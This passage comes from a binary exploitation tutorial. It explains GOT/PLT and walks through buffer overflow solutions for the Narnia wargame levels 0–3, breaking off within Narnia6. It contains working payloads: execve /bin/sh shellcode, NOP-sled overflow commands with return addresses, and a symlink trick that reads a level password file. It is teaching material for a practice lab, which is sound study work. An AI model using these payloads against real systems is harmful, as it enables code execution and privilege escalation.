  0x08049799 &lt;__libc_start_main@got.plt+1&gt;:    add    DWORD PTR [eax+ecx*1],0x0
  0x0804979d &lt;data_start+1&gt;:   add    BYTE PTR [eax],al
  0x0804979f &lt;data_start+3&gt;:   add    BYTE PTR [eax],al
  0x080497a1 &lt;__dso_handle+1&gt;: add    BYTE PTR [eax],al
  0x080497a3 &lt;__dso_handle+3&gt;: add    BYTE PTR [eax],al
  0x080497a5 &lt;stdin@@GLIBC_2.0+1&gt;: add    BYTE PTR [eax],al
  0x080497a7 &lt;stdin@@GLIBC_2.0+3&gt;: add    BYTE PTR [eax],al
End of assembler dump.
</pre></div>
</div>
<p>Objdump reflects the same (notice the +1) GOT address:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">objdump</span> <span class="o">--</span><span class="n">dynamic</span><span class="o">-</span><span class="n">reloc</span> <span class="o">./</span><span class="n">behemoth3</span>

<span class="o">./</span><span class="n">behemoth3</span><span class="p">:</span>     <span class="n">file</span> <span class="nb">format</span> <span class="n">elf32</span><span class="o">-</span><span class="n">i386</span>

<span class="n">DYNAMIC</span> <span class="n">RELOCATION</span> <span class="n">RECORDS</span>
<span class="n">OFFSET</span>   <span class="n">TYPE</span>              <span class="n">VALUE</span>
<span class="mi">08049778</span> <span class="n">R_386_GLOB_DAT</span>    <span class="n">__gmon_start__</span>
<span class="mi">080497</span><span class="n">a4</span> <span class="n">R_386_COPY</span>        <span class="n">stdin</span>
<span class="mi">08049788</span> <span class="n">R_386_JUMP_SLOT</span>   <span class="n">printf</span>
<span class="mi">0804978</span><span class="n">c</span> <span class="n">R_386_JUMP_SLOT</span>   <span class="n">fgets</span>
<span class="mi">08049790</span> <span class="n">R_386_JUMP_SLOT</span>   <span class="n">puts</span>
<span class="mi">08049794</span> <span class="n">R_386_JUMP_SLOT</span>   <span class="n">__gmon_start__</span>
<span class="mi">08049798</span> <span class="n">R_386_JUMP_SLOT</span>   <span class="n">__libc_start_main</span>
</pre></div>
</div>
<p>Quick diagram what it looks like:</p>
<p>So a quick diagram of what happens looks kind&#8217;a like this:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="p">[</span><span class="n">printf</span><span class="p">()]</span> <span class="o">&lt;--------------------------------</span>
   <span class="o">|</span>                                       <span class="o">|</span>
   <span class="o">--------------&gt;</span> <span class="p">[</span><span class="n">PLT</span><span class="p">]</span><span class="o">---&gt;</span><span class="p">[</span><span class="n">d_r_resolve</span><span class="p">]</span><span class="o">--|</span>
                     <span class="o">|</span>           <span class="o">|</span>         <span class="o">|</span>
                     <span class="o">--------------------&gt;</span><span class="p">[</span><span class="n">GOT</span><span class="p">]</span><span class="o">&lt;--</span>
                                 <span class="o">|</span>               <span class="o">|</span>
                                  <span class="o">-------&gt;</span><span class="p">[</span><span class="n">libc</span><span class="p">]</span><span class="o">--</span>
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>A good paper to read about and from where the definition and diagram is taken is How to Hijack the Global Offset Table with pointers</li>
</ul>
</div></blockquote>
</div>
<div class="section" id="buffer-overflow-examples">
<h2>Buffer Overflow Examples<a class="headerlink" href="#buffer-overflow-examples" title="Permalink to this headline">¶</a></h2>
<ul class="simple">
<li>Let&#8217;s see a simple example of binary exploitation Narnia0 where we have to write a written value.</li>
</ul>
<blockquote>
<div><div class="code c highlight-default"><div class="highlight"><pre><span></span><span class="c1">#include &lt;stdio.h&gt;</span>
<span class="c1">#include &lt;stdlib.h&gt;</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(){</span>
    <span class="n">long</span> <span class="n">val</span><span class="o">=</span><span class="mh">0x41414141</span><span class="p">;</span>
    <span class="n">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>

    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Correct val&#39;s value from 0x41414141 -&gt; 0xdeadbeef!</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Here is your chance: &quot;</span><span class="p">);</span>
    <span class="n">scanf</span><span class="p">(</span><span class="s2">&quot;</span><span class="si">%24s</span><span class="s2">&quot;</span><span class="p">,</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">);</span>

    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;buf: </span><span class="si">%s</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span><span class="n">buf</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;val: 0x</span><span class="si">%08x</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span><span class="n">val</span><span class="p">);</span>

    <span class="k">if</span><span class="p">(</span><span class="n">val</span><span class="o">==</span><span class="mh">0xdeadbeef</span><span class="p">)</span>
        <span class="n">system</span><span class="p">(</span><span class="s2">&quot;/bin/sh&quot;</span><span class="p">);</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;WAY OFF!!!!</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
</div>
<p>In this example, value of variable val can be overwritten by overflowing buf. Another small observation is scanf function scans 24 characters. If you directly write 20 &#8220;A&#8221; and the address it won&#8217;t work as the val doesn&#8217;t matches. So, we have to use python print command. If we use</p>
<div class="code python highlight-default"><div class="highlight"><pre><span></span><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s1">&#39;print &quot;A&quot;*20 + &quot;</span><span class="se">\xef\xbe\xad\xde</span><span class="s1">&quot;&#39;</span> <span class="o">|</span> <span class="o">./</span><span class="n">narnia0</span>
</pre></div>
</div>
<p>you will see that the value would match but the shell is exited. To keep the shell active, we need to use cat as shown below:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="p">(</span><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s1">&#39;print &quot;A&quot;*20 + &quot;</span><span class="se">\xef\xbe\xad\xde</span><span class="s1">&quot;&#39;</span><span class="p">;</span><span class="n">cat</span><span class="p">)</span> <span class="o">|</span> <span class="o">./</span><span class="n">narnia0</span>
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>In another example below Narnia1</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="c1">#include &lt;stdio.h&gt;</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(){</span>
    <span class="nb">int</span> <span class="p">(</span><span class="o">*</span><span class="n">ret</span><span class="p">)();</span>

    <span class="k">if</span><span class="p">(</span><span class="n">getenv</span><span class="p">(</span><span class="s2">&quot;EGG&quot;</span><span class="p">)</span><span class="o">==</span><span class="n">NULL</span><span class="p">){</span>
        <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Give me something to execute at the env-variable EGG</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Trying to execute EGG!</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">getenv</span><span class="p">(</span><span class="s2">&quot;EGG&quot;</span><span class="p">);</span>
    <span class="n">ret</span><span class="p">();</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
</div>
<p>We need to set a environment variable EGG with an shellcode. Previously, I tried with</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">export</span> <span class="n">EGG</span><span class="o">=</span><span class="s2">&quot;</span><span class="se">\b</span><span class="s2">in\sh&quot;</span>
<span class="ow">and</span>
<span class="n">export</span> <span class="n">EGG</span><span class="o">=</span><span class="s2">&quot;</span><span class="se">\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80</span><span class="s2">&quot;</span>
</pre></div>
</div>
<p>Shellcode were taken from the Shellstorm website. However, both failed with Segmentation fault. superkojiman, barrebas helped me with and told that if I write</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>export EGG=`python -c &#39;print &quot;\xCC&quot;&#39;`
</pre></div>
</div>
<p>It should sigtrap. &#8220;xCC&#8221; acts as a software breakpoint, basically an INT3, It tells you whether your shellcode is stored properly &amp; executed, if the program receives SIGTRAP, you know you&#8217;re good to go, and it&#8217;s a good way to make sure you&#8217;ve properly redirected execution to your shellcode. You can further put &#8220;xCC&#8221; anywhere in the shellcode, if it crashes before &#8220;xCC&#8221;, you know for sure that your shellcode has bad characters. They suggested to export the EGG variable as</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>export EGG=`python -c &#39;print &quot;\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80&quot;&#39;`
</pre></div>
</div>
<p>and it worked like a charm.</p>
</div></blockquote>
<ul class="simple">
<li>In another example Narnia2</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="c1">#include &lt;stdio.h&gt;</span>
<span class="c1">#include &lt;string.h&gt;</span>
<span class="c1">#include &lt;stdlib.h&gt;</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(</span><span class="nb">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> <span class="o">*</span> <span class="n">argv</span><span class="p">[]){</span>
    <span class="n">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>

    <span class="k">if</span><span class="p">(</span><span class="n">argc</span> <span class="o">==</span> <span class="mi">1</span><span class="p">){</span>
        <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Usage: </span><span class="si">%s</span><span class="s2"> argument</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">strcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;</span><span class="si">%s</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
</div>
<p>It&#8217;s to easy that buffer overflow vulnerability exists because of strcpy. Let&#8217;s see what is the offset for this.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>ulimit -c unlimited
./narnia2 `/usr/share/metasploit-framework/tools/pattern_create.rb 200`
Segmentation fault (core dumped)

gdb -q -c core ./narnia2
#0  0x37654136 in ?? ()

/usr/share/metasploit-framework/tools/pattern_offset.rb 0x37654136
[*] Exact match at offset 140
narnia2@melinda:~$ gdb -q /narnia/narnia2
(gdb) disassemble main
Dump of assembler code for function main:
**Snip**
   0x080484a0 &lt;+67&gt;:    mov    %eax,(%esp)
   0x080484a3 &lt;+70&gt;:    call   0x8048320 &lt;strcpy@plt&gt;
**Snip**
End of assembler dump.
(gdb) br *main+70
Breakpoint 1 at 0x80484a3
(gdb) run `python -c &#39;print &quot;A&quot;*140 + &quot;BBBB&quot;&#39;`
Starting program: /games/narnia/narnia2 `python -c &#39;print &quot;A&quot;*140 + &quot;BBBB&quot;&#39;`

Breakpoint 1, 0x080484a3 in main ()
(gdb) n
0x42424242 in ?? ()
</pre></div>
</div>
<p>Let&#8217;s see the stack after the strcpy, which would tell us the probable address we want to redirect execution.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>(gdb) x/80xw $esp+400
0xffffd7e0: 0x0000000f  0xffffd80b  0x00000000  0x00000000
0xffffd7f0: 0x00000000  0x00000000  0x1d000000  0xa9c79d1b
0xffffd800: 0xe1a67367  0xc19fc850  0x6996cde4  0x00363836
0xffffd810: 0x2f000000  0x656d6167  0x616e2f73  0x61696e72
0xffffd820: 0x72616e2f  0x3261696e  0x41414100  0x41414141
0xffffd830: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd840: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd850: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd860: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd870: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd880: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd890: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8a0: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8b0: 0x41414141  0x42424241  0x44580042  0x45535f47
0xffffd8c0: 0x4f495353  0x44495f4e  0x3939383d  0x53003733
</pre></div>
</div>
<p>Let pick a shellcode from shellstorm for a Linux x86 execuve /bin/sh and calculate the number of NOPs</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia2@melinda:~$ python -c &#39;print len(&quot;\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80&quot;)&#39;
23
narnia2@melinda:~$ bc
140-23
117
narnia2@melinda:~$ /narnia/narnia2 `python -c &#39;print &quot;\x90&quot;*117 + &quot;\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80&quot; + &quot;\x50\xd8\xff\xff&quot;&#39;`
$ cat /etc/narnia_pass/narnia3
**********
$
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>In another example Narnia3</li>
</ul>
<blockquote>
<div><div class="code c highlight-default"><div class="highlight"><pre><span></span><span class="c1">#include &lt;stdio.h&gt;</span>
<span class="c1">#include &lt;sys/types.h&gt;</span>
<span class="c1">#include &lt;sys/stat.h&gt;</span>
<span class="c1">#include &lt;fcntl.h&gt;</span>
<span class="c1">#include &lt;unistd.h&gt;</span>
<span class="c1">#include &lt;stdlib.h&gt;</span>
<span class="c1">#include &lt;string.h&gt;</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(</span><span class="nb">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">){</span>

        <span class="nb">int</span>  <span class="n">ifd</span><span class="p">,</span>  <span class="n">ofd</span><span class="p">;</span>
        <span class="n">char</span> <span class="n">ofile</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="s2">&quot;/dev/null&quot;</span><span class="p">;</span>
        <span class="n">char</span> <span class="n">ifile</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>

        <span class="k">if</span><span class="p">(</span><span class="n">argc</span> <span class="o">!=</span> <span class="mi">2</span><span class="p">){</span>
                <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;usage, </span><span class="si">%s</span><span class="s2"> file, will send contents of file 2 /dev/null</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
                <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="o">/*</span> <span class="nb">open</span> <span class="n">files</span> <span class="o">*/</span>
        <span class="n">strcpy</span><span class="p">(</span><span class="n">ifile</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
        <span class="k">if</span><span class="p">((</span><span class="n">ofd</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">ofile</span><span class="p">,</span><span class="n">O_RDWR</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">){</span>
                <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;error opening </span><span class="si">%s</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">ofile</span><span class="p">);</span>
                <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">if</span><span class="p">((</span><span class="n">ifd</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">ifile</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">){</span>
                <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;error opening </span><span class="si">%s</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">ifile</span><span class="p">);</span>
                <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="o">/*</span> <span class="n">copy</span> <span class="kn">from</span> <span class="nn">file1</span> <span class="n">to</span> <span class="n">file2</span> <span class="o">*/</span>
        <span class="n">read</span><span class="p">(</span><span class="n">ifd</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="n">write</span><span class="p">(</span><span class="n">ofd</span><span class="p">,</span><span class="n">buf</span><span class="p">,</span> <span class="n">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;copied contents of </span><span class="si">%s</span><span class="s2"> to a safer place... (</span><span class="si">%s</span><span class="s2">)</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span><span class="n">ifile</span><span class="p">,</span><span class="n">ofile</span><span class="p">);</span>

        <span class="o">/*</span> <span class="n">close</span> <span class="s1">&#39;em */</span>
        <span class="n">close</span><span class="p">(</span><span class="n">ifd</span><span class="p">);</span>
        <span class="n">close</span><span class="p">(</span><span class="n">ofd</span><span class="p">);</span>

        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
</pre></div>
</div>
<p>Superkojiman notes explain this best, copied here with permission, thanks superkojiman :)</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia3@melissa:/narnia$ ./narnia3 /etc/motd
copied contents of /etc/motd to a safer place... (/dev/null)
</pre></div>
</div>
<p>We can use this program to read the contents of /etc/narnia_pass/narnia4, but the output is written to /dev/null. We control the input file and the output file is set as /dev/null. However, because of the way the stack is laid out, we can write past the ifile buffer and overwrite the value of ofile. This lets us replace /dev/null with another file of our choosing. Here&#8217;s what the stack looks like:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="o">+---------+</span>
<span class="o">|</span>  <span class="n">ret</span>    <span class="o">|</span>
<span class="o">|</span>  <span class="n">sfp</span>    <span class="o">|</span>
<span class="o">|</span>  <span class="n">ofd</span>    <span class="o">|</span>
<span class="o">|</span>  <span class="n">ifd</span>    <span class="o">|</span>
<span class="o">|</span>  <span class="n">ofile</span>  <span class="o">|</span>
<span class="o">|</span>  <span class="n">ifile</span>  <span class="o">|</span>
<span class="o">|</span>  <span class="n">buf</span>    <span class="o">|</span>
<span class="o">+---------+</span> <span class="o">&lt;-</span> <span class="n">esp</span>
</pre></div>
</div>
<p>ifile and ofile are 32-byte arrays. We can compile the program with -ggdb and examine it in gdb</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="c1"># gcc -ggdb -m32 -fno-stack-protector -Wl,-z,norelro narnia3.c -o narnia3</span>
<span class="c1"># gdb -q narnia3</span>
</pre></div>
</div>
<p>If we disas main, we can see that strcpy is called at *main+100:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>0x08048551 &lt;+93&gt;:    lea    0x38(%esp),%eax
0x08048555 &lt;+97&gt;:    mov    %eax,(%esp)
0x08048558 &lt;+100&gt;:   call   0x8048400 &lt;strcpy@plt&gt;
0x0804855d &lt;+105&gt;:   movl   $0x2,0x4(%esp)
0x08048565 &lt;+113&gt;:   lea    0x58(%esp),%eax
0x08048569 &lt;+117&gt;:   mov    %eax,(%esp)
</pre></div>
</div>
<p>We set a breakpoint there and run the program with the following arguments:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>(gdb) r `python -c &#39;print &quot;A&quot;*32 + &quot;/tmp/hack&quot;&#39;`
Starting program: /root/wargames/narnia/3/narnia3 `python -c &#39;print &quot;A&quot;*32 + &quot;/tmp/hack&quot;&#39;`

Breakpoint 1, 0x08048558 in main (argc=2, argv=0xbffff954) at narnia3.c:37
37          strcpy(ifile, argv[1]);
</pre></div>
</div>
<p>At the first breakpoint, we examine the local variables</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">i</span> <span class="nb">locals</span>
<span class="n">ifd</span> <span class="o">=</span> <span class="mi">134514299</span>
<span class="n">ofd</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1208180748</span>
<span class="n">ofile</span> <span class="o">=</span> <span class="s2">&quot;/dev/null</span><span class="se">\000\000\000\000\000\000</span><span class="s2">&quot;</span>
<span class="n">ifile</span> <span class="o">=</span> <span class="s2">&quot;x</span><span class="se">\370\377\277\234\203\004\b\200\020\377\267\214\230\004\b\250\370\377\277\211\206\004\b</span><span class="s2">$</span><span class="se">\243\374\267\364\237</span><span class="s2">&quot;</span><span class="p">,</span> <span class="o">&lt;</span><span class="n">incomplete</span> <span class="n">sequence</span> \<span class="mi">374</span>\<span class="mi">267</span><span class="o">&gt;</span>
<span class="n">buf</span> <span class="o">=</span> <span class="s2">&quot;</span><span class="se">\370\370\377\267\364\237\374\267\371\234\367\267\245</span><span class="s2">B</span><span class="se">\352\267</span><span class="s2">h</span><span class="se">\370\377\277</span><span class="s2">չ</span><span class="se">\350\267\364\237\374\267\214\230\004\b</span><span class="s2">&quot;</span>
</pre></div>
</div>
<p>ofile is set to /dev/null as expected. We&#8217;ll step to the next instruction and check again.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span> <span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">s</span>
 <span class="mi">38</span>          <span class="k">if</span><span class="p">((</span><span class="n">ofd</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">ofile</span><span class="p">,</span><span class="n">O_RDWR</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">){</span>
 <span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">i</span> <span class="nb">locals</span>
 <span class="n">ifd</span> <span class="o">=</span> <span class="mi">134514299</span>
 <span class="n">ofd</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1208180748</span>
 <span class="n">ofile</span> <span class="o">=</span> <span class="s2">&quot;/tmp/hack</span><span class="se">\000\000\000\000\000\000</span><span class="s2">&quot;</span>
 <span class="n">ifile</span> <span class="o">=</span> <span class="s1">&#39;A&#39;</span> <span class="o">&lt;</span><span class="n">repeats</span> <span class="mi">32</span> <span class="n">times</span><span class="o">&gt;</span>
 <span class="n">buf</span> <span class="o">=</span> <span class="s2">&quot;</span><span class="se">\370\370\377\267\364\237\374\267\371\234\367\267\245</span><span class="s2">B</span><span class="se">\352\267</span><span class="s2">h</span><span class="se">\370\377\277</span><span class="s2">չ</span><span class="se">\350\267\364\237\374\267\214\230\004\b</span><span class="s2">&quot;</span>

<span class="n">As</span> <span class="n">expected</span><span class="p">,</span> <span class="n">ofile</span> <span class="n">has</span> <span class="n">been</span> <span class="n">overwritten</span> <span class="n">to</span> <span class="o">/</span><span class="n">tmp</span><span class="o">/</span><span class="n">hack</span><span class="o">.</span> <span class="n">However</span> <span class="n">ifile</span> <span class="ow">is</span> <span class="n">now</span> <span class="n">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span><span class="o">/</span><span class="n">tmp</span><span class="o">/</span><span class="n">hack</span> <span class="n">so</span> <span class="ow">in</span> <span class="n">order</span> <span class="n">to</span> <span class="n">read</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">narnia_pass</span><span class="o">/</span><span class="n">narnia4</span><span class="p">,</span> <span class="n">we</span> <span class="n">need</span> <span class="n">to</span> <span class="n">create</span> <span class="n">a</span> <span class="n">directory</span> <span class="n">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span><span class="o">/</span><span class="n">tmp</span> <span class="ow">and</span> <span class="n">symlink</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">narnia_pass</span><span class="o">/</span><span class="n">narnia4</span> <span class="n">to</span> <span class="n">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span><span class="o">/</span><span class="n">tmp</span><span class="o">/</span><span class="n">hack</span>
</pre></div>
</div>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia3@melissa:/tmp/skojiman3$ mkdir -p AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp
narnia3@melissa:/tmp/skojiman3$ ln -s /etc/narnia_pass/narnia4 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack
</pre></div>
</div>
<p>Next we need to create the output file /tmp/hack that ofile points to</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia3@melissa:/tmp/skojiman3$ touch /tmp/hack
narnia3@melissa:/tmp/skojiman3$ chmod 666 /tmp/hack
narnia3@melissa:/tmp/skojiman3$ ls -l /tmp/hack
-rw-rw-rw- 1 narnia3 narnia3 0 2012-11-24 22:58 /tmp/hack
</pre></div>
</div>
<p>Finally, execute /narnia/narnia3 as follows:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia3@melissa:/tmp/skojiman3$ /narnia/narnia3 `python -c &#39;print &quot;A&quot;*32 + &quot;/tmp/hack&quot;&#39;`
copied contents of AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack to a safer place... (/tmp/hack)
narnia3@melissa:/tmp/skojiman3$ cat /tmp/hack
thaenohtai
��*������e���@�narnia3@melissa:/tmp/skojiman3$
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Let&#8217;s see another example Narnia6.</li>
</ul>
<blockquote>
<div><div class="code c highlight-default"><div class="highlight"><pre><span></span><span class="c1">#include &lt;stdio.h&gt;</span>
<span class="c1">#include &lt;stdlib.h&gt;</span>
<span class="c1">#include &lt;string.h&gt;</span>

<span class="n">extern</span> <span class="n">char</span> <span class="o">**</span><span class="n">environ</span><span class="p">;</span>

<span class="o">//</span> <span class="n">tired</span> <span class="n">of</span> <span class="n">fixing</span> <span class="n">values</span><span class="o">...</span>
<span class="o">//</span> <span class="o">-</span> <span class="n">morla</span>
<span class="n">unsigned</span> <span class="n">long</span> <span class="n">get_sp</span><span class="p">(</span><span class="n">void</span><span class="p">)</span> <span class="p">{</span>
       <span class="n">__asm__</span><span class="p">(</span><span class="s2">&quot;movl </span><span class="si">%e</span><span class="s2">sp,</span><span class="si">%e</span><span class="s2">ax</span><span class="se">\n\t</span><span class="s2">&quot;</span>
               <span class="s2">&quot;and $0xff000000, </span><span class="si">%e</span><span class="s2">ax&quot;</span>
               <span class="p">);</span>
<span class="p">}</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(</span><span class="nb">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[]){</span>
    <span class="n">char</span> <span class="n">b1</span><span class="p">[</span><span class="mi">8</span><span class="p">],</span> <span class="n">b2</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>
    <span class="nb">int</span>  <span class="p">(</span><span class="o">*</span><span class="n">fp</span><span class="p">)(</span><span class="n">char</span> <span class="o">*</span><span class="p">)</span><span class="o">=</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="o">*</span><span class="p">)(</span><span class="n">char</span> <span class="o">*</span><span class="p">))</span><span class="o">&amp;</span><span class="n">puts</span><span class="p">,</span> <span class="n">i</span><span class="p">;</span>

    <span class="k">if</span><span class="p">(</span><span class="n">argc</span><span class="o">!=</span><span class="mi">3</span><span class="p">){</span> <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;</span><span class="si">%s</span><span class="s2"> b1 b2</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span>

    <span class="o">/*</span> <span class="n">clear</span> <span class="n">environ</span> <span class="o">*/</span>
    <span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">environ</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">!=</span> <span class="n">NULL</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">memset</span><span class="p">(</span><span class="n">environ</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">environ</span><span class="p">[</span><span class="n">i</span><span class="p">]));</span>
    <span class="o">/*</span> <span class="n">clear</span> <span class="n">argz</span>    <span class="o">*/</span>
